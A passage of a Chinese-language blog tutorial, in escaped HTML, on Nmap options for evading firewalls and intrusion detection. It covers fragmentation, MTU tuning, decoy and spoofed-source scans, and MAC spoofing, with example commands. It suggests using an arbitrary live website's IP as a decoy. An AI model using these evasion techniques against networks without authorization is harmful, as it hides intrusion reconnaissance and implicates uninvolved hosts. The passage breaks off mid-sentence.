class=\"wp-block-paragraph\">\u9632\u706b\u5899\u662f\u5728\u5916\u90e8\u7f51\u7edc\u4e0e\u5185\u90e8\u7f51\u7edc\u4e4b\u95f4\u642d\u5efa\u4e00\u4e2a\u76d1\u63a7\uff08\u8fd0\u884c\u7684\u539f\u7406\u6709\u70b9\u50cfFiddler\uff09\uff0c\u901a\u8fc7\u5bf9\u7279\u5b9a\u5f00\u653e\u7684\u7aef\u53e3\u8fdb\u884c\u5c4f\u853d\u6389\uff0c\u4ece\u800c\u8fbe\u5230\u7f51\u7edc\u5b89\u5168\u7684\u4f5c\u7528\uff0c\u9632\u706b\u5899\u5728\u5176\u529f\u80fd\u4e0a\u4e5f\u4f1a\u6709\u4e00\u4e9b\u5176\u4ed6\u7684\u529f\u80fd\uff0c\u8fd9\u4e2a\u8981\u770b\u9632\u706b\u5899\u7684\u5b9e\u9645\u60c5\u51b5<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u89c4\u907f\u7684\u57fa\u672c\u601d\u8def\u662f\uff1a<\/p>\n\n\n<p class=\"wp-block-paragraph\">1\u3001\u901a\u8fc7\u4f2a\u9020\u8bbf\u95ee\u7684IP\u5730\u5740<\/p>\n\n\n<p class=\"wp-block-paragraph\">2\u3001\u901a\u8fc7\u5bf9\u53d1\u9001\u4fe1\u606f\u8fdb\u884c\u5904\u7406<\/p>\n\n\n<p class=\"wp-block-paragraph\">3\u3001\u5c06\u98ce\u9669\u8fdb\u884c\u5ac1\u63a5<\/p>\n\n\n<p class=\"wp-block-paragraph\">4\u3001\u5176\u4ed6\u7684\u6280\u672f<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170517134336859?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe13\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe13\" \/><\/figure>\n\n\n<pre class=\"wp-block-code\"><code>-f; --mtu value \u6307\u5b9a\u4f7f\u7528\u5206\u7247\u3001\u6307\u5b9a\u6570\u636e\u5305\u7684MTU.\n-D decoy1,decoy2,ME \u4f7f\u7528\u8bf1\u9975\u9690\u853d\u626b\u63cf\n-S IP-ADDRESS \u6e90\u5730\u5740\u6b3a\u9a97\n-e interface \u4f7f\u7528\u6307\u5b9a\u7684\u63a5\u53e3\n-g\/ --source-port PROTNUM \u4f7f\u7528\u6307\u5b9a\u6e90\u7aef\u53e3 \n--proxies url1,&#91;url2],... \u4f7f\u7528HTTP\u6216\u8005SOCKS4\u7684\u4ee3\u7406 \n\n--data-length NUM \u586b\u5145\u968f\u673a\u6570\u636e\u8ba9\u6570\u636e\u5305\u957f\u5ea6\u8fbe\u5230NUM\n--ip-options OPTIONS \u4f7f\u7528\u6307\u5b9a\u7684IP\u9009\u9879\u6765\u53d1\u9001\u6570\u636e\u5305\n--ttl VALUE \u8bbe\u7f6eIP time-to-live\u57df\n--spoof-mac ADDR\/PREFIX\/VEBDOR MAC\u5730\u5740\u4f2a\u88c5\n--badsum \u4f7f\u7528\u9519\u8bef\u7684checksum\u6765\u53d1\u9001\u6570\u636e\u5305<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u5f88\u591aInternet\u5148\u9a71\u4eec\u8bbe\u60f3\u4e86\u4e00\u4e2a\u5168\u7403\u5f00\u653e\u7684\u7f51\u7edc\uff0c\u4f7f\u7528\u5168\u5c40\u7684IP \u5730\u5740\u7a7a\u95f4\uff0c\u4f7f\u5f97\u4efb\u4f55\u4e24\u4e2a\u8282\u70b9\u4e4b\u95f4\u90fd\u6709\u865a\u62df\u8fde\u63a5\u3002\u8fd9\u4f7f\u5f97\u4e3b\u673a\u95f4\u53ef\u4ee5\u4f5c\u4e3a\u771f \u6b63\u7684\u5bf9\u7b49\u4f53\uff0c\u76f8\u4e92\u95f4\u63d0\u4f9b\u670d\u52a1\u548c\u83b7\u53d6\u4fe1\u606f\u3002\u4eba\u4eec\u53ef\u4ee5\u5728\u5de5\u4f5c\u65f6\u8bbf\u95ee\u5bb6\u91cc\u6240 \u6709\u7684\u7cfb\u7edf\u3001\u8c03\u8282\u7a7a\u8c03\u6e29\u5ea6\u3001\u4e3a\u63d0\u524d\u5230\u6765\u7684\u5ba2\u4eba\u5f00\u95e8\u3002\u968f\u540e\uff0c\u8fd9\u4e9b\u5168\u7403\u8fde\u63a5\u7684\u8bbe\u60f3 \u53d7\u5230\u4e86\u5730\u5740\u7a7a\u95f4\u77ed\u7f3a\u548c\u5b89\u5168\u8003\u8651\u7684\u9650\u5236\u3002\u572890\u5e74\u4ee3\u65e9\u671f\uff0c\u5404\u79cd\u673a\u6784\u5f00\u59cb\u90e8 \u7f72\u9632\u706b\u5899\u6765\u5b9e\u73b0\u51cf\u5c11\u8fde\u63a5\u7684\u76ee\u7684\uff0c\u5927\u578b\u7f51\u7edc\u901a\u8fc7\u4ee3\u7406\u3001NAT\u548c\u5305\u8fc7\u6ee4\u5668\u4e0e\u672a \u8fc7\u6ee4\u7684Internet\u9694\u79bb\u3002\u4e0d\u53d7\u9650\u7684\u4fe1\u606f\u6d41\u88ab\u4e25\u683c\u63a7\u5236\u7684\u53ef\u4fe1\u901a\u4fe1\u901a\u9053\u4fe1\u606f\u6d41\u6240\u66ff\u4ee3\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7c7b\u4f3c\u9632\u706b\u5899\u7684\u7f51\u7edc\u9694\u79bb\u4f7f\u5f97\u5bf9\u7f51\u7edc\u7684\u641c\u7d22\u66f4\u52a0\u56f0\u96be\uff0c\u968f\u610f\u7684\u641c \u7d22\u53d8\u5f97\u4e0d\u518d\u7b80\u5355\u3002\u7136\u800c\uff0cNmap\u63d0\u4f9b\u4e86\u5f88\u591a\u7279\u6027\u7528\u4e8e\u7406\u89e3\u8fd9\u4e9b\u590d\u6742\u7684\u7f51 \u7edc\uff0c\u5e76\u4e14\u68c0\u9a8c\u8fd9\u4e9b\u8fc7\u6ee4\u5668\u662f\u5426\u6b63\u5e38\u5de5\u4f5c\u3002\u6b64\u5916\uff0cNmap\u63d0\u4f9b\u4e86\u7ed5\u8fc7\u67d0\u4e9b\u8f83\u5f31\u7684 \u9632\u8303\u673a\u5236\u7684\u624b\u6bb5\u3002\u68c0\u9a8c\u7f51\u7edc\u5b89\u5168\u72b6\u6001\u6700\u6709\u6548\u7684\u65b9\u6cd5\u4e4b\u4e00\u662f\u5c1d\u8bd5\u54c4\u9a97\u7f51\u7edc\uff0c\u5c06 \u81ea\u5df1\u60f3\u8c61\u6210\u4e00\u4e2a\u653b\u51fb\u8005\uff0c\u4f7f\u7528\u672c\u8282\u63d0\u4f9b\u7684\u6280\u672f\u6765\u653b\u51fb\u81ea\u5df1\u7684\u7f51\u7edc\u3002\u5982\u4f7f\u7528FTP bounce\u626b\u63cf\u3001Idle\u626b\u63cf\u3001\u5206\u7247\u653b\u51fb\u6216\u5c1d\u8bd5\u7a7f\u900f\u81ea\u5df1\u7684\u4ee3\u7406\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u9650\u6b62\u7f51\u7edc\u7684\u884c\u4e3a\u5916\uff0c\u4f7f\u7528\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf(IDS)\u7684\u516c\u53f8\u4e5f\u4e0d\u65ad\u589e\u52a0\u3002\u7531\u4e8eNmap \u5e38\u7528\u4e8e\u653b\u51fb\u524d\u671f\u7684\u626b\u63cf\uff0c\u56e0\u6b64\u6240\u6709\u4e3b\u6d41\u7684IDS\u90fd\u5305\u542b\u4e86\u68c0\u6d4bNmap\u626b\u63cf\u7684\u89c4\u5219\u3002 \u73b0\u5728\uff0c\u8fd9\u4e9b\u4ea7\u54c1\u53d8\u5f62\u4e3a\u5165\u4fb5<em>\u9884\u9632<\/em>\u7cfb\u7edf(IPS)\uff0c\u53ef\u4ee5\u4e3b \u52a8\u5730\u963b\u6b62\u53ef\u7591\u7684\u6076\u610f\u884c\u4e3a\u3002\u4e0d\u5e78\u7684\u662f\uff0c\u7f51\u7edc\u7ba1\u7406\u5458\u548cIDS\u5382\u5546\u901a\u8fc7\u5206\u6790\u62a5\u6587 \u6765\u68c0\u6d4b\u6076\u610f\u884c\u4e3a\u662f\u4e00\u4e2a\u8270\u82e6\u7684\u5de5\u4f5c\uff0c\u6709\u8010\u5fc3\u548c\u6280\u672f\u7684\u653b\u51fb\u8005\uff0c\u5728\u7279\u5b9aNmap\u9009\u9879 \u7684\u5e2e\u52a9\u4e0b\uff0c\u5e38\u5e38\u53ef\u4ee5\u4e0d\u88abIDS\u68c0\u6d4b\u5230\u3002\u540c\u65f6\uff0c\u7ba1\u7406\u5458\u5fc5\u987b\u5e94\u4ed8\u5927\u91cf\u7684\u8bef\u62a5\u7ed3\u679c\uff0c \u6b63\u5e38\u7684\u884c\u4e3a\u88ab\u8bef\u5224\u800c\u88ab\u6539\u53d8\u6216\u963b\u6b62\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6709\u65f6\uff0c\u4eba\u4eec\u5efa\u8baeNmap\u4e0d\u5e94\u8be5\u63d0\u4f9b\u8eb2\u95ed\u9632\u706b\u5899\u89c4\u5219\u6216\u54c4\u9a97IDS\u7684\u529f\u80fd\uff0c \u8fd9\u4e9b\u529f\u80fd\u53ef\u80fd\u4f1a\u88ab\u653b\u51fb\u8005\u6ee5\u7528\uff0c\u7136\u800c\u7ba1\u7406\u5458\u5374\u53ef\u4ee5\u5229\u7528\u8fd9\u4e9b\u529f\u80fd\u6765\u589e\u5f3a\u5b89\u5168\u6027\u3002 \u5b9e\u9645\u4e0a\uff0c\u653b\u51fb\u7684\u65b9\u6cd5\u4ecd\u53ef\u88ab\u653b\u51fb\u8005\u5229\u7528\uff0c\u4ed6\u4eec\u53ef\u4ee5\u53d1\u73b0\u5176\u5b83\u5de5\u5177\u6216Nmap\u7684\u8865\u4e01\u7a0b \u5e8f\u3002\u540c\u65f6\uff0c\u7ba1\u7406\u5458\u53d1\u73b0\u653b\u51fb\u8005\u7684\u5de5\u4f5c\u66f4\u52a0\u56f0\u96be\uff0c\u76f8\u6bd4\u8f83\u91c7\u53d6\u63aa\u65bd\u6765\u9884\u9632\u6267 \u884cFTP Bounce\u653b\u51fb\u7684\u5de5\u5177\u800c\u8a00\uff0c\u90e8\u7f72\u5148\u8fdb\u7684\u3001\u6253\u8fc7\u8865\u4e01\u7684FTP\u670d\u52a1\u5668\u66f4 \u52a0\u6709\u6548\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u4e0d\u63d0\u4f9b\u68c0\u6d4b\u548c\u7834\u574f\u9632\u706b\u5899\u53caIDS\u7cfb\u7edf\u7684\u9b54\u5f39(\u6216Nmap\u9009\u9879)\uff0c\u5b83\u4f7f\u7528 \u7684\u662f\u6280\u672f\u548c\u7ecf\u9a8c\uff0c\u8fd9\u8d85\u51fa\u4e86\u672c\u53c2\u8003\u624b\u518c\u7684\u8303\u56f4\uff0c\u4e0b\u9762\u63cf\u8ff0\u4e86\u76f8\u5173\u7684\u9009\u9879\u548c \u5b8c\u6210\u7684\u5de5\u4f5c\u3002<code>-f<\/code>&nbsp;(\u62a5\u6587\u5206\u6bb5); &nbsp;<code>--mtu<\/code>&nbsp;(\u4f7f\u7528\u6307\u5b9a\u7684MTU)<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>-f<\/code>\u9009\u9879\u8981\u6c42\u626b\u63cf\u65f6(\u5305\u633aping\u626b\u63cf)\u4f7f\u7528 \u5c0f\u7684IP\u5305\u5206\u6bb5\u3002\u5176\u601d\u8def\u662f\u5c06TCP\u5934\u5206\u6bb5\u5728\u51e0\u4e2a\u5305\u4e2d\uff0c\u4f7f\u5f97\u5305\u8fc7\u6ee4\u5668\u3001 IDS\u4ee5\u53ca\u5176\u5b83\u5de5\u5177\u7684\u68c0\u6d4b\u66f4\u52a0\u56f0\u96be\u3002\u5fc5\u987b\u5c0f\u5fc3\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\uff0c\u6709\u4e9b\u7cfb \u7edf\u5728\u5904\u7406\u8fd9\u4e9b\u5c0f\u5305\u65f6\u5b58\u5728\u95ee\u9898\uff0c\u4f8b\u5982\u65e7\u7684\u7f51\u7edc\u55c5\u63a2\u5668Sniffit\u5728\u63a5\u6536 \u5230\u7b2c\u4e00\u4e2a\u5206\u6bb5\u65f6\u4f1a\u7acb\u523b\u51fa\u73b0\u5206\u6bb5\u9519\u8bef\u3002\u8be5\u9009\u9879\u4f7f\u7528\u4e00\u6b21\uff0cNmap\u5728IP \u5934\u540e\u5c06\u5305\u5206\u62108\u4e2a\u5b57\u8282\u6216\u66f4\u5c0f\u3002\u56e0\u6b64\uff0c\u4e00\u4e2a20\u5b57\u8282\u7684TCP\u5934\u4f1a\u88ab\u5206\u62103\u4e2a \u5305\uff0c\u5176\u4e2d2\u4e2a\u5305\u5206\u522b\u6709TCP\u5934\u76848\u4e2a\u5b57\u8282\uff0c\u53e61\u4e2a\u5305\u6709TCP\u5934\u7684\u5269\u4e0b4\u4e2a\u5b57 \u8282\u3002\u5f53\u7136\uff0c\u6bcf\u4e2a\u5305\u90fd\u6709\u4e00\u4e2aIP\u5934\u3002\u518d\u6b21\u4f7f\u7528<code>-f<\/code>\u53ef\u4f7f\u7528 16\u5b57\u8282\u7684\u5206\u6bb5(\u51cf\u5c11\u5206\u6bb5\u6570\u91cf)\u3002\u4f7f\u7528<code>--mtu<\/code>\u9009\u9879\u53ef \u4ee5\u81ea\u5b9a\u4e49\u504f\u79fb\u7684\u5927\u5c0f\uff0c\u4f7f\u7528\u65f6\u4e0d\u9700\u8981<code>-f<\/code>\uff0c\u504f\u79fb\u91cf\u5fc5\u987b \u662f8\u7684\u500d\u6570\u3002\u5305\u8fc7\u6ee4\u5668\u548c\u9632\u706b\u5899\u5bf9\u6240\u6709\u7684IP\u5206\u6bb5\u6392\u961f\uff0c\u5982Linux\u6838\u5fc3\u4e2d\u7684 CONFIG-IP-ALWAYS-DEFRAG\u914d\u7f6e\u9879\uff0c\u5206\u6bb5\u5305\u4e0d\u4f1a\u76f4\u63a5\u4f7f\u7528\u3002\u4e00\u4e9b\u7f51\u7edc\u65e0\u6cd5 \u627f\u53d7\u8fd9\u6837\u6240\u5e26\u6765\u7684\u6027\u80fd\u51b2\u51fb\uff0c\u4f1a\u5c06\u8fd9\u4e2a\u914d\u7f6e\u7981\u6b62\u3002\u5176\u5b83\u7981\u6b62\u7684\u539f\u56e0\u6709\u5206\u6bb5 \u5305\u4f1a\u901a\u8fc7\u4e0d\u540c\u7684\u8def\u7531\u8fdb\u5165\u7f51\u7edc\u3002\u4e00\u4e9b\u6e90\u7cfb\u7edf\u5728\u5185\u6838\u4e2d\u5bf9\u53d1\u9001\u7684\u62a5\u6587\u8fdb\u884c \u5206\u6bb5\uff0c\u4f7f\u7528iptables\u8fde\u63a5\u8ddf\u8e2a\u6a21\u5757\u7684Linux\u5c31\u662f\u4e00\u4e2a\u4f8b\u5b50\u3002\u5f53\u4f7f\u7528\u7c7b\u4f3cEthereal \u7684\u55c5\u63a2\u5668\u65f6\uff0c\u626b\u63cf\u5fc5\u987b\u4fdd\u8bc1\u53d1\u9001\u7684\u62a5\u6587\u8981\u5206\u6bb5\u3002\u5982\u679c\u4e3b\u673a\u64cd\u4f5c\u7cfb\u7edf\u4f1a\u4ea7 \u751f\u95ee\u9898\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>--send-eth<\/code>\u9009\u9879\u4ee5\u907f\u5f00IP\u5c42\u800c\u76f4\u63a5 \u53d1\u9001\u539f\u59cb\u7684\u4ee5\u592a\u7f51\u5e27\u3002\u4f7f\u7528\u6307\u5b9a\u7684mtu \u53ef\u4ee5\u8fbe\u5230\u9003\u9038 IDS\/\u9632\u706b\u5899 \u7684\u76ee\u7684\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f \u504f\u79fb\u91cf \u5fc5\u987b \u662f 8 \u7684\u6574\u6570\u500d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -v -f 172.27.42.110 &nbsp; \u4f8b\u5b50\uff1a &nbsp;nmap --mtu 16&nbsp;172.27.42.110<code>-D &lt;decoy1 [\uff0cdecoy2][\uff0cME]\uff0c...&gt;<\/code>&nbsp;(\u4f7f\u7528\u8bf1\u9975\u9690\u853d\u626b\u63cf\uff0c\u4f7f\u7528\u82f1\u6587\u9017\u53f7\u5206\u5272\u6bcf\u4e2a\u8bf1\u9975\u4e3b\u673a)<\/p>\n\n\n<p class=\"wp-block-paragraph\">nmap -D [decoy1,decoy2,decoyN | RND:number] [\u76ee\u6807\u4e3b\u673a] \u3002\u53ef\u4ee5\u4f7f\u7528-D\u6307\u5b9a\u591a\u4e2a\u8bf1\u9975\u4e3b\u673a\uff0c\u6216\u8005\u4f7f\u7528RND\u968f\u673a\u751f\u6210\u51e0\u4e2a\u5730\u5740\u3002\u5728\u8fdb\u884c\u7248\u672c\u68c0\u6d4b\u6216\u8005TCP\u626b\u63cf\u65f6\u8bf1\u9975\u662f\u65e0\u6548\u7684\u3002&nbsp;<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -D RND:10 172.27.42.110 &nbsp; \/\/\u4f7f\u752810\u4e2a\u968f\u673a\u7684\u4e0d\u540c\u7684IP\u5411\u4e3b\u673a\u53d1\u9001SYN\u5305\uff0c\u8fd9\u4e2a\u5f88\u5bb9\u6613\u88ab\u53d1\u73b0\u3002\u53ef\u4ee5\u6307\u5b9aIP\u6548\u679c\u66f4\u597d<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -D 192.168.0.1,192.168.0.2,192.168.0.3 192.168.121.1 &nbsp;\/\/\u6307\u5b9a3\u4e2a\u8bf1\u9975IP\u6765\u626b\u63cf\u76ee\u6807\u4e3b\u673a192.168.121.1<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f8b\u5b50\uff1anmap -D&nbsp;192.168.0.1,192.168.0.2,192.168.0.3,ME&nbsp;192.168.121.1&nbsp; \/\/\u4f7f\u7528ME\u9009\u9879\u6307\u5b9a\u81ea\u5df1\u771f\u5b9eIP\u6765\u626b\u63cf192.168.121.1<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4f7f\u8bf1\u9975\u626b\u63cf\u8d77\u4f5c\u7528\uff0c\u9700\u8981\u4f7f\u8fdc\u7a0b\u4e3b\u673a\u8ba4\u4e3a\u662f\u8bf1\u9975\u5728\u626b\u63cf\u76ee\u6807\u7f51\u7edc\u3002 IDS\u53ef\u80fd\u4f1a\u62a5\u4e2a\u67d0\u4e2aIP\u76845-10\u4e2a\u7aef\u53e3\u626b\u63cf\uff0c\u4f46\u5e76\u4e0d\u77e5\u9053\u54ea\u4e2aIP\u5728\u626b\u63cf\u4ee5\u53ca \u54ea\u4e9b\u4e0d\u662f\u8bf1\u9975\u3002\u4f46\u8fd9\u79cd\u65b9\u5f0f\u53ef\u4ee5\u901a\u8fc7\u8def\u7531\u8ddf\u8e2a\u3001\u54cd\u5e94\u4e22\u5f03\u4ee5\u53ca\u5176\u5b83\u4e3b\u52a8 \u673a\u5236\u5728\u89e3\u51b3\u3002\u8fd9\u662f\u4e00\u79cd\u5e38\u7528\u7684\u9690\u85cf\u81ea\u8eabIP\u5730\u5740\u7684\u6709\u6548\u6280\u672f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u9017\u53f7\u5206\u9694\u6bcf\u4e2a\u8bf1\u9975\u4e3b\u673a\uff0c\u4e5f\u53ef\u7528\u81ea\u5df1\u7684\u771f\u5b9eIP\u4f5c\u4e3a\u8bf1\u9975\uff0c\u8fd9\u65f6\u53ef\u4f7f\u7528&nbsp;<code>ME<\/code>\u9009\u9879\u8bf4\u660e\u3002\u5982\u679c\u5728\u7b2c6\u4e2a\u4f4d\u7f6e\u6216 \u66f4\u540e\u7684\u4f4d\u7f6e\u4f7f\u7528<code>ME<\/code>\u9009\u9879\uff0c\u4e00\u4e9b\u5e38\u7528 \u7aef\u53e3\u626b\u63cf\u68c0\u6d4b\u5668(\u5982Solar Designer's excellent scanlogd)\u5c31\u4e0d\u4f1a\u62a5\u544a \u8fd9\u4e2a\u771f\u5b9eIP\u3002\u5982\u679c\u4e0d\u4f7f\u7528<code>ME<\/code>\u9009\u9879\uff0cNmap \u5c06\u771f\u5b9eIP\u653e\u5728\u4e00\u4e2a\u968f\u673a\u7684\u4f4d\u7f6e<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\uff0c\u4f5c\u4e3a\u8bf1\u9975\u7684\u4e3b\u673a\u987b\u5728\u5de5\u4f5c\u72b6\u6001\uff0c\u5426\u5219\u4f1a\u5bfc\u81f4\u76ee\u6807\u4e3b\u673a\u7684SYN\u6d2a\u6c34\u653b\u51fb\u3002&nbsp;\u5982\u679c\u5728\u7f51\u7edc\u4e2d\u53ea\u6709\u4e00\u4e2a\u4e3b\u673a\u5728\u5de5\u4f5c\uff0c\u90a3\u5c31\u5f88\u5bb9\u6613\u786e\u5b9a\u54ea\u4e2a\u4e3b\u673a\u5728\u626b\u63cf\u3002\u4e5f\u53ef \u4f7f\u7528IP\u5730\u5740\u4ee3\u66ff\u4e3b\u673a\u540d(\u88ab\u8bf1\u9a97\u7684\u7f51\u7edc\u5c31\u4e0d\u53ef\u80fd\u5728\u540d\u5b57\u670d\u52a1\u5668\u65e5\u5fd7\u4e2d\u53d1\u73b0)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8bf1\u9975\u53ef\u7528\u5728\u521d\u59cb\u7684ping\u626b\u63cf(ICMP\u3001SYN\u3001ACK\u7b49)\u9636\u6bb5\u6216\u771f\u6b63\u7684\u7aef\u53e3\u626b\u63cf \u9636\u6bb5\u3002\u8bf1\u9975\u4e5f\u53ef\u4ee5\u7528\u4e8e\u8fdc\u7a0b\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b(-O)\u3002\u5728\u8fdb\u884c\u7248 \u672c\u68c0\u6d4b\u6216TCP\u8fde\u63a5\u626b\u63cf\u65f6\uff0c\u8bf1\u9975\u65e0\u6548\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u8fc7\u591a\u7684\u8bf1\u9975\u6ca1\u6709\u4efb\u4f55\u4ef7\u503c\uff0c\u53cd\u800c\u5bfc\u81f4\u626b\u63cf\u53d8\u6162\u5e76\u4e14\u7ed3\u679c\u4e0d\u51c6\u786e\u3002 \u6b64\u5916\uff0c\u4e00\u4e9bISP\u4f1a\u8fc7\u6ee4\u54c4\u9a97\u7684\u62a5\u6587\uff0c\u4f46\u5f88\u591a\u5bf9\u6b3a\u9a97IP\u5305\u6ca1\u6709\u4efb\u4f55\u9650\u5236\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f8b\u5b50\uff1a\u865a\u6784\u4e00\u4e2aIP\u4e3a203.88.163.34\u4e0e\u81ea\u5df1\u7684\u771f\u5b9e\u5730\u5740\u53bb\u626b\u63cfnmap.org<br>\u547d\u4ee4\uff1anmap -F -D 203.88.163.34,ME nmap.org<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u662f\u5728\u4f7f\u7528\u4f2a\u9020\u7684IP\u7684\u540c\u65f6\uff0c\u6211\u4eec\u8981\u6ce8\u610f\u8981\u5bf9\u4f2a\u9020\u7684IP\u8fdb\u884c\u4e3b\u673a\u53d1\u73b0\uff0c\u6765\u5224\u65ad\u4e3b\u673a\u662f\u5426\u5b58\u5728\uff0c\u662f\u5426\u5f00\u542f\uff0c\u56e0\u4e3a\u6709\u4e9b\u9632\u706b\u5899\u7b56\u7565\u662f\u6709\u8fd9\u6837\u89c4\u5b9a\u7684\uff1a<strong>\u5982\u679c\u8bbf\u95ee\u7684IP\u4e3b\u673a\u662f\u5173\u95ed\u6216\u8005\u662f\u4e3a\u7a7a\u7684\u8bdd\uff0c\u5c31\u8bb2\u6240\u6709\u7684\u8fd4\u56de\u5185\u5bb9\u8fc7\u6ee4\u6389\u3002<\/strong>\u8bd5\u60f3\u5982\u679c\u4e3b\u673a\u5173\u95ed\u6216\u8005\u662f\u4e0d\u5b58\u5728\uff0c\u90a3\u4e48\u600e\u4e48\u53ef\u80fd\u4f1a\u53d1\u9001\u626b\u63cf\u7684\u547d\u4ee4\u7ed9\u76ee\u6807\u4e3b\u673a\u5462\uff1f<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u8981\u627e\u5230\u5f00\u542f\u7684\u76ee\u6807\u4e3b\u673a\u7406\u8bba\u4e0a\u662f\u6ca1\u6709\u4ec0\u4e48\u8981\u6c42\u7684\uff0c\u4f46\u662f\u4e3a\u4e86\u8282\u7ea6\u65f6\u95f4\uff0c\u5efa\u8bae\u662f\u76f4\u63a5\u4f7f\u7528\u67d0\u4e2a\u7f51\u7ad9\u7684IP\u5730\u5740\uff0c\u8fd9\u6837\u6709\u4e00\u4e0b\u7684\u51e0\u4e2a\u597d\u5904<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>1\u3001IP\u5730\u5740\u5bb9\u6613\u83b7\u5f97\uff0c\u4e00\u822c\u7684\u7f51\u7ad9\u662f\u901a\u8fc7ping\u53c2\u6570\u5c31\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u8be5\u7f51\u7ad9\u7684IP\u5730\u5740\uff0c\u9664\u4e86\u4e00\u4e9b\u4e0d\u8ba9\u8fdb\u884cPing\u64cd\u4f5c\u7684\u7f51\u7ad9\u9664\u5916<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>2\u3001\u5bb9\u6613\u4fdd\u8bc1IP\u7684\u6b63\u5e38\u5f00\u542f\uff0c\u56e0\u4e3a\u8c01\u5bb6\u7684\u7f51\u7ad9\u4f1a\u7ecf\u5e38\u5173\u95ed\u670d\u52a1\u5668\uff0c\u670d\u52a1\u5668\u4e00\u822c\u662f\u603b\u662f\u5f00\u542f\u7684<\/strong><br><code>-S &lt;IP_Address&gt;<\/code>&nbsp;(\u6e90\u5730\u5740\u54c4\u9a97)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0cNmap\u53ef\u80fd\u65e0\u6cd5\u786e\u5b9a\u4f60\u7684\u6e90\u5730\u5740(\u5982\u679c\u8fd9\u6837\uff0cNmap\u4f1a\u7ed9\u51fa \u63d0\u793a)\u3002\u6b64\u65f6\uff0c\u4f7f\u7528<code>-S<\/code>\u9009\u9879\u5e76\u8bf4\u660e\u6240\u9700\u53d1\u9001\u5305\u7684\u63a5\u53e3IP\u5730\u5740\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u6807\u5fd7\u7684\u53e6\u4e00\u4e2a\u7528\u5904\u662f\u54c4\u9a97\u6027\u7684\u626b\u63cf\uff0c\u4f7f\u5f97\u76ee\u6807\u8ba4\u4e3a\u662f<em>\u53e6 \u4e00\u4e2a\u5730\u5740<\/em>\u5728\u8fdb\u884c\u626b\u63cf\u3002\u53ef\u4ee5\u60f3\u8c61\u67d0\u4e00\u4e2a\u7ade\u4e89\u5bf9\u624b\u5728\u4e0d\u65ad\u626b\u63cf\u67d0\u4e2a\u516c\u53f8\uff01&nbsp;<code>-e<\/code>\u9009\u9879\u5e38\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\u4f7f\u7528\uff0c\u4e5f\u53ef\u91c7\u7528<code>-P0<\/code>\u9009\u9879\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6e90\u5730\u5740\u6b3a\u9a97\u7684\u539f\u7406\u662f\uff1a\u901a\u8fc7\u5c06\u81ea\u5df1\u7684IP\u4f2a\u88c5\u6210\u4e3a\u5176\u4ed6\u7684IP\u53bb\u626b\u63cf\u76ee\u6807\u4e3b\u673a\u4ece\u800c\u9a97\u8fc7\u76ee\u6807\u4e3b\u673a\u7684\u8ffd\u8e2a<br>\u5047\u8bbe\u8981\u4f2a\u88c5\u6210\u4e3a1.1.1.1\uff1a\u53c2\u6570-S 1.1.1.1 \u4f7f\u75281.1.1.1\u8fdb\u884c\u626b\u63cf\uff0c\u8ba9\u9632\u706b\u5899\u8bef\u4ee5\u4e3a\u662f\u6765\u81ea1.1.1.1\u7684\u626b\u63cf\u884c\u4e3a<br>\u5728\u4f7f\u7528\u7684\u65f6\u5019\u8981\u6ce8\u610f\u4e0e-e\u8fdb\u884c\u4f7f\u7528\uff0c\u56e0\u4e3a\u9664\u4e86\u5236\u5b9a\u8981\u4f2a\u88c5\u6210\u4e3a\u7684\u5bf9\u8c61IP\u5916\uff0c\u8fd8\u8981\u6307\u5b9a\u8fd4\u56de\u7684IP\u5730\u5740\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f46Nmap\u53ef\u4ee5\u8fdb\u884c\u81ea\u52a8\u68c0\u6d4b\uff0c \u5982\u679c\u68c0\u6d4b\u4e0d\u51fa\u4f1a\u7ed9\u51fa\u63d0\u793a\u3002<br><code>-e 